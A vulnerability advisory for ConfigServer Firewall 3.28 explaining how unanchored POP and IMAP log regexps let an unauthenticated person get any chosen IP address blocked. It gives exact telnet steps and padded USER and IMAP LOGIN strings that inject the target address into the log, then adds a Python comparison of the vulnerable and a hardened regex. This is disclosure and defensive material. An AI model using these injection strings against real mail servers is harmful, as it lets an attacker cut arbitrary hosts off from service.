CSF 3.28 - remotely block any IP address (POP and IMAP regexps)



DESCRIPTION


ConfigServer Firewall 3.28 provides the option to block brute-force login attempts on various services. The regexps in csf/regexp.pm for the POP and IMAP services allowed any remote, unauthenticated person to block any IP address of their choice. The code looked similar to the following:

    # The unanchored ".*ip=.*:" lets an "ip=" string inside the user-supplied
    # login name (logged in the user= field) supply the address that gets blocked.
    if ( $line =~ /pop3d(-ssl)?: LOGIN FAILED.*ip=.*:(\d+\.\d+\.\d+\.\d+)/ ) {
        return ( 'Unsuccessful POP3 login from', $2, 'pop3d' );
    }



IMPACT


Remote, unauthenticated persons could block any IP address of their choice.


The following steps can be performed 10 times to take advantage of this issue:


1. telnet $victim_mailserver 110

2. issue the following 2 commands:

USER ANYTHINGip=:1.2.3.4
PASS a

where "ANYTHING" is (486 - 4 - length of the IP address string).



In the example above, "ANYTHING" would be 475 characters of whatever you want. The result will be that lfd calls iptables to block 1.2.3.4.


This also works on the IMAP regexp with some adjustments to the login string:

a001 LOGIN ANYTHINGip=:1.2.3.4


This is what a normal POP login failure from the maillog looks like:

Sep  8 17:39:31 host pop3d: LOGIN FAILED, user=alice, ip=[::ffff:1.1.1.1]

and this is what the log will look like when you issue the 2 commands from step 2 above:

Sep  8 17:38:03 host pop3d: LOGIN FAILED, user=AAA..(475 "A"s)..AAAAip=:1.2.3.4


What we've done is inject the IP address we want (1.2.3.4) at the very end of the log line. You can verify this by following the same steps shown above, but replacing "1.2.3.4" with "1.2.3.45" in the "USER AAA..." line. You will then see the following log line immediately after the "LOGIN FAILED" line:

Sep  8 17:57:04 host pop3d: 5, ip=[::ffff:1.1.1.1]

Note the "5" all by itself: it is the end of the "1.2.3.45" string, which overflowed onto the next log line together with the real ip= field.
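As an added illustration (not code from this advisory or from CSF), the following Python reproduces the vulnerable pattern quoted above next to a hardened, format-aware pattern and runs both over the log lines shown in this advisory. The hardened pattern and the extract_ip_* helpers are assumptions of this example, not the project's actual fix.

```python
import re

# Vulnerable pattern, transcribed from the csf/regexp.pm excerpt in the advisory:
# the unanchored ".*ip=.*:" lets an "ip=" string placed in the user= field by the
# remote client supply the address that lfd then blocks.
VULNERABLE = re.compile(r"pop3d(-ssl)?: LOGIN FAILED.*ip=.*:(\d+\.\d+\.\d+\.\d+)")

# Hardened pattern (assumption: illustrative fix, not CSF's own patch). It requires
# the structured "user=<name>, ip=[...]" layout of the real pop3d line, accepts the
# "::ffff:" IPv4-mapped prefix, and anchors the bracketed ip= field at end of line.
HARDENED = re.compile(
    r"pop3d(?:-ssl)?: LOGIN FAILED, user=(?P<user>.*), "
    r"ip=\[(?:::ffff:)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]$"
)


def extract_ip_vulnerable(line):
    """Address the original regexp would hand to lfd, or None if no match."""
    m = VULNERABLE.search(line)
    return m.group(2) if m else None


def extract_ip_hardened(line):
    """Address to act on, or None if the line does not parse as a clean failure.
    A user= value that itself contains 'ip=' is treated as log injection and the
    line is left for manual review instead of triggering a block. A regex cannot
    recover a field the logger has already truncated away, so lines that hit the
    logger's length limit should be treated as untrusted as well."""
    m = HARDENED.search(line)
    if not m or "ip=" in m.group("user"):
        return None
    return m.group("ip")


# Sample lines taken from the advisory (the 475 "A"s are generated rather than typed).
NORMAL = "Sep  8 17:39:31 host pop3d: LOGIN FAILED, user=alice, ip=[::ffff:1.1.1.1]"
INJECTED = "Sep  8 17:38:03 host pop3d: LOGIN FAILED, user=" + "A" * 475 + "ip=:1.2.3.4"
SPILLOVER = "Sep  8 17:57:04 host pop3d: 5, ip=[::ffff:1.1.1.1]"


def demo():
    """Map each sample line to (vulnerable result, hardened result)."""
    return {
        name: (extract_ip_vulnerable(line), extract_ip_hardened(line))
        for name, line in (("normal", NORMAL), ("injected", INJECTED), ("spillover", SPILLOVER))
    }


if __name__ == "__main__":
    for name, (vuln, hard) in demo().items():
        print(f"{name:10s} vulnerable={vuln!r:12} hardened={hard!r}")
```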